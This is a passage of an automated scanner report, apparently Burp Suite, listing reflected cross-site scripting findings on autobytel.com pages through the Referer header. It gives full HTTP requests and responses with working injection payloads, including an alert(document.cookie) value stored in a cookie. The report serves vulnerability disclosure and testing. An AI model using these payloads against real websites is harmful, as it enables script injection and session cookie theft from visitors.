Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Thu, 17-Jan-2041 00:04:40 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E5b925%22%3Balert%281%29%2F%2F7f41c8730bc;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 38923


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~5b925";alert(1)//7f41c8730bc";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "48DBB291-F863-7FBA-A6F0FF79
...[SNIP]...

4.1902. http://www.autobytel.com/car-dealers.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-dealers.htm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload d824a--><img%20src%3da%20onerror%3dalert(1)>c54ae44041b was submitted in the Referer HTTP header. This input was echoed as d824a--><img src=a onerror=alert(1)>c54ae44041b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /car-dealers.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=d824a--><img%20src%3da%20onerror%3dalert(1)>c54ae44041b

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Tue, 25 Jan 2011 00:04:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:04:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Thu, 17-Jan-2041 00:04:47 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Thu, 17-Jan-2041 00:04:47 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Ed824a%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3Ec54ae44041b;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 38961


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<!-- searchphrase: d824a--><img src=a onerror=alert(1)>c54ae44041b -->
...[SNIP]...

4.1903. http://www.autobytel.com/car-financing.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-financing.htm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 93624--><img%20src%3da%20onerror%3dalert(1)>a406ae0398d was submitted in the Referer HTTP header. This input was echoed as 93624--><img src=a onerror=alert(1)>a406ae0398d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /car-financing.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=93624--><img%20src%3da%20onerror%3dalert(1)>a406ae0398d

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:53:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:53:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:53:41 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:53:41 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E93624%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3Ea406ae0398d;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 41559


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<!-- searchphrase: 93624--><img src=a onerror=alert(1)>a406ae0398d -->
...[SNIP]...

4.1904. http://www.autobytel.com/car-financing.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-financing.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4487a"%3balert(1)//fd21207da5d was submitted in the Referer HTTP header. This input was echoed as 4487a";alert(1)//fd21207da5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /car-financing.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=4487a"%3balert(1)//fd21207da5d

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:53:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:53:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:53:29 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:53:29 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E4487a%22%3Balert%281%29%2F%2Ffd21207da5d;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 41521


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~4487a";alert(1)//fd21207da5d";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "4875259E-03DC-8F03-1FD18285
...[SNIP]...

4.1905. http://www.autobytel.com/car-incentives.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-incentives.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1358d"%3balert(1)//337f917d70d was submitted in the Referer HTTP header. This input was echoed as 1358d";alert(1)//337f917d70d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /car-incentives.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=1358d"%3balert(1)//337f917d70d

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 33998
Expires: Mon, 24 Jan 2011 23:51:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:51:01 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:51:01 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:51:01 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E1358d%22%3Balert%281%29%2F%2F337f917d70d;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~1358d";alert(1)//337f917d70d";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "485EB0AB-A383-4E80-12077B3C
...[SNIP]...

4.1906. http://www.autobytel.com/car-incentives.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-incentives.htm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload b7de5--><img%20src%3da%20onerror%3dalert(1)>3a1ce75c479 was submitted in the Referer HTTP header. This input was echoed as b7de5--><img src=a onerror=alert(1)>3a1ce75c479 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /car-incentives.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=b7de5--><img%20src%3da%20onerror%3dalert(1)>3a1ce75c479

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 34036
Expires: Mon, 24 Jan 2011 23:51:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:51:10 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:51:10 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:51:10 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Eb7de5%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E3a1ce75c479;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<!-- searchphrase: b7de5--><img src=a onerror=alert(1)>3a1ce75c479 -->
...[SNIP]...

4.1907. http://www.autobytel.com/car-news.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-news.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f67d4"%3balert(1)//076a85faa1d was submitted in the Referer HTTP header. This input was echoed as f67d4";alert(1)//076a85faa1d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /car-news.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=f67d4"%3balert(1)//076a85faa1d

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Tue, 25 Jan 2011 00:00:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:00:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Thu, 17-Jan-2041 00:00:26 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Thu, 17-Jan-2041 00:00:26 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Ef67d4%22%3Balert%281%29%2F%2F076a85faa1d;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 40956


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~f67d4";alert(1)//076a85faa1d";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "48B4DD26-BE7A-9BB2-795600D8
...[SNIP]...

4.1908. http://www.autobytel.com/car-news.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-news.htm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 934eb--><img%20src%3da%20onerror%3dalert(1)>6182ba0f111 was submitted in the Referer HTTP header. This input was echoed as 934eb--><img src=a onerror=alert(1)>6182ba0f111 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /car-news.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=934eb--><img%20src%3da%20onerror%3dalert(1)>6182ba0f111

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Tue, 25 Jan 2011 00:02:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:02:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Thu, 17-Jan-2041 00:02:40 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Thu, 17-Jan-2041 00:02:40 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E934eb%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E6182ba0f111;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 40994


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<!-- searchphrase: 934eb--><img src=a onerror=alert(1)>6182ba0f111 -->
...[SNIP]...

4.1909. http://www.autobytel.com/car-pictures.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-pictures.htm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload f15c5--><img%20src%3da%20onerror%3dalert(1)>8d4686ca011 was submitted in the Referer HTTP header. This input was echoed as f15c5--><img src=a onerror=alert(1)>8d4686ca011 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /car-pictures.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=f15c5--><img%20src%3da%20onerror%3dalert(1)>8d4686ca011

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 43671
Expires: Mon, 24 Jan 2011 23:58:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:58:06 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:58:05 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:58:05 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Ef15c5%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E8d4686ca011;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<!-- searchphrase: f15c5--><img src=a onerror=alert(1)>8d4686ca011 -->
...[SNIP]...

4.1910. http://www.autobytel.com/car-pictures.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-pictures.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1156f"%3balert(1)//1427023b7d4 was submitted in the Referer HTTP header. This input was echoed as 1156f";alert(1)//1427023b7d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /car-pictures.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
